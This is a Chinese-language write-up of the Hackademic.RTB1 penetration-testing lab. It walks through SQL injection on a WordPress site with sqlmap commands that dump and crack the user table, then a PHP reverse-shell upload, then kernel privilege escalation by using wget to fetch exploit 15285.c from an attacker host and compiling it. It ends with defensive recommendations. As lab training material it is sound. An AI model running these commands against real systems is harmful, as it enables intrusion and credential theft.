靶场练习之Hackademic.RTB1
字数 1419 2025-08-10 08:54:01
Hackademic.RTB1 靶场渗透测试教学文档
靶场概述
Hackademic.RTB1 是一个模拟真实环境的渗透测试靶场,目标是获取系统root权限并读取/root/Key.txt文件。靶场运行在Linux系统上,内核版本为2.6.31,运行WordPress网站系统。
渗透测试流程
1. 信息收集
- 端口扫描:发现22端口(SSH)不可用,80端口(HTTP)开放
- Web目录扫描:初步扫描未发现敏感目录
- 网站访问:访问80端口发现WordPress站点,页面提示"Please go to your target and try to get root"
2. Web应用测试
SQL注入发现
- 点击"posted in Uncategorized"中的"Uncategorized"链接
- 观察URL格式:
http://[IP]/Hackademic_RTB1/?cat=1 - 测试SQL注入:在URL后添加单引号(
'),发现报错,确认存在SQL注入漏洞
SQL注入利用
使用sqlmap工具进行自动化注入:
# 枚举数据库
sqlmap -u http://192.168.121.142/Hackademic_RTB1/?cat=1 --dbs
# 发现wordpress数据库后,枚举表
sqlmap -u http://192.168.121.142/Hackademic_RTB1/?cat=1 -D wordpress --tables
# 查看wp_users表结构
sqlmap -u http://192.168.121.142/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --columns
# 导出wp_users表数据
sqlmap -u http://192.168.121.142/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --dump
# 使用sqlmap自动破解哈希密码
WordPress后台登录
- 通过注入获取的用户名和密码登录WordPress后台:
- 后台地址:
http://[IP]/Hackademic_RTB1/wp-admin/
- 后台地址:
- 识别高权限用户:
- 检查user_level字段值
- 或逐个用户尝试登录,高权限用户登录后界面不同
- 示例高权限用户:GeorgeMiller
3. 获取Web Shell
- 在WordPress后台创建或上传PHP文件
- 写入反弹shell代码:
- 可使用工具生成(如hack-tools浏览器扩展)
- 或使用在线生成工具(如棱角社区)
- 确保PHP上传权限已开启(检查WordPress设置)
- 上传后访问该PHP文件触发反弹shell
4. 权限提升
- 获取初始shell后检查系统信息:
uname -a
# 输出显示内核版本:2.6.31
- 搜索内核漏洞:
searchsploit linux 2.6.3
# 发现多个可能的漏洞,如15285.c
-
利用内核漏洞提权:
- 在攻击机(Kali)上启动HTTP服务:
python3 -m http.server 80- 在目标机上下载漏洞利用代码:
wget http://[攻击机IP]/15285.c- 编译并执行:
chmod +x 15285.c gcc 15285.c -o 15285 ./15285
5. 获取Flag
成功提权至root后,读取目标文件:
cat /root/Key.txt
关键知识点总结
- SQL注入识别:通过添加单引号测试输入点
- sqlmap使用:自动化SQL注入工具的高级用法
- WordPress安全:
- 默认后台地址/wp-admin/
- 用户权限识别方法
- Web Shell上传:
- PHP反弹shell技术
- 上传权限配置检查
- Linux提权技术:
- 内核漏洞识别(uname -a)
- searchsploit使用
- 远程下载并编译漏洞利用代码
- 网络传输技巧:
- Python简易HTTP服务器
- wget下载远程文件
防御建议
- 防止SQL注入:
- 使用参数化查询
- 实施输入验证
- WordPress安全加固:
- 限制后台访问IP
- 使用强密码
- 定期更新插件和主题
- 文件上传防护:
- 限制可上传文件类型
- 禁用PHP执行权限
- 系统安全:
- 及时更新内核补丁
- 实施最小权限原则
- 监控系统日志
工具清单
- sqlmap - SQL注入工具
- netcat (nc) - 网络调试与反弹shell监听
- searchsploit - 漏洞数据库搜索工具
- gcc - C代码编译工具
- Python3 - 简易HTTP服务器
- wget - 文件下载工具
通过本靶场练习,可以全面掌握从Web应用到系统层面的渗透测试技术链,包括信息收集、漏洞利用、权限提升等关键环节。